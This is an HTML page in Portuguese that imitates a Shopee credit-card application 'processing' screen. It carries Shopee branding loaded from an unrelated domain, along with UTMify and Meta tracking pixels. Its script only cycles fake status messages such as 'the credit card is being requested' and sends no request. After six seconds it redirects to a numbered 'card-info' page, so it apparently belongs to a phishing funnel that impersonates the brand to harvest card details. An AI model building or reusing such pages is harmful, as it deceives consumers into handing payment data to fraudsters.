﻿<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cartão Shopee - Processando</title>




    <script>
        window.pixelId = "675fc2adbe7dec4a0a382d31";
        var a = document.createElement("script");
        a.setAttribute("async", "");
        a.setAttribute("defer", "");
        a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
        document.head.appendChild(a);
      </script>
      
      
      <script
        src="https://cdn.utmify.com.br/scripts/utms/latest.js"
        data-utmify-prevent-subids
        async
        defer
      ></script>
      
      <!-- Meta Pixel Code -->
      <script>
      !function(f,b,e,v,n,t,s)
      {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
      n.callMethod.apply(n,arguments):n.queue.push(arguments)};
      if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
      n.queue=[];t=b.createElement(e);t.async=!0;
      t.src=v;s=b.getElementsByTagName(e)[0];
      s.parentNode.insertBefore(t,s)}(window, document,'script',
      'https://connect.facebook.net/en_US/fbevents.js');
      fbq('init', '9027210824040972');
      fbq('track', 'PageView');
      </script>
      <noscript><img height="1" width="1" style="display:none"
      src="https://www.facebook.com/tr?id=9027210824040972&ev=PageView&noscript=1"
      /></noscript>
      <!-- End Meta Pixel Code -->





    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap');

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Inter', sans-serif;
        }

        body {
            background-color: #f6f6f6;
            color: #1a1a1a;
            min-height: 100vh;
            display: flex;
            flex-direction: column;
        }

        .header {
            background: #EE4D2D;
            color: #ffffff;
            padding: 1rem 0;
            text-align: center;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        }

        .main-content {
            flex: 1;
            display: flex;
            justify-content: center;
            align-items: center;
            padding: 2rem;
            text-align: center;
            min-height: calc(100vh - 80px);
            background: white;
        }

        .loading-content {
            display: flex;
            flex-direction: column;
            align-items: center;
            max-width: 400px;
            margin: 0 auto;
        }

        .spinner {
            width: 48px;
            height: 48px;
            border: 4px solid #FFF5F3;
            border-radius: 50%;
            border-top: 4px solid #EE4D2D;
            animation: spin 1s linear infinite;
            margin-bottom: 1.5rem;
        }

        .loading-text {
            font-size: 1.25rem;
            color: #1F2937;
            font-weight: 500;
            margin: 0;
            animation: pulse 2s infinite;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        @keyframes pulse {
            0% { opacity: 1; }
            50% { opacity: 0.7; }
            100% { opacity: 1; }
        }

        .progress-wrapper {
            width: 100%;
            max-width: 300px;
            margin-top: 2rem;
            background: #FFF5F3;
            border-radius: 12px;
            padding: 1rem;
            border: 1px solid rgba(238, 77, 45, 0.1);
        }

        .progress-bar {
            width: 100%;
            height: 4px;
            background: #FFF5F3;
            border-radius: 2px;
            overflow: hidden;
            position: relative;
            margin-top: 0.5rem;
        }

        .progress-bar::after {
            content: '';
            position: absolute;
            top: 0;
            left: 0;
            height: 100%;
            width: 30%;
            background: #EE4D2D;
            animation: progress 3s infinite;
        }

        @keyframes progress {
            0% { left: -30%; }
            100% { left: 100%; }
        }

        .status-text {
            font-size: 0.875rem;
            color: #4B5563;
            margin-bottom: 0.5rem;
        }

        @media (max-width: 768px) {
            .main-content {
                padding: 1rem;
            }

            .loading-text {
                font-size: 1.125rem;
            }
        }
    </style>
</head>
<body>
    <div class="header">
        <img src="https://pabluzw.com/shopee-cartao/logo.png" alt="Shopee Logo" style="width: 160px;">
    </div>

    <div class="main-content">
        <div class="loading-content">
            <div class="spinner"></div>
            <p id="loading-text" class="loading-text">Aguarde a resposta do sistema...</p>
            
    
        </div>
    </div>

    <script>
        function iniciarCarregamento() {
            const frases = [
                "O cartão de Crédito está sendo solicitado...",
                "Aguarde a Resposta do Sistema.",
                "Solicitação em Andamento."
            ];
            let fraseIndex = 0;
            
            const fraseInterval = setInterval(() => {
                if (fraseIndex < frases.length) {
                    document.getElementById('loading-text').innerText = frases[fraseIndex];
                    fraseIndex++;
                } else {
                    fraseIndex = 0;
                }
            }, 1000);
            
            setTimeout(() => {
                clearInterval(fraseInterval);
                window.location.href = '../8-card-info/index.php.html';
            }, 6000);
        }

        iniciarCarregamento();
    </script>


</body>
</html>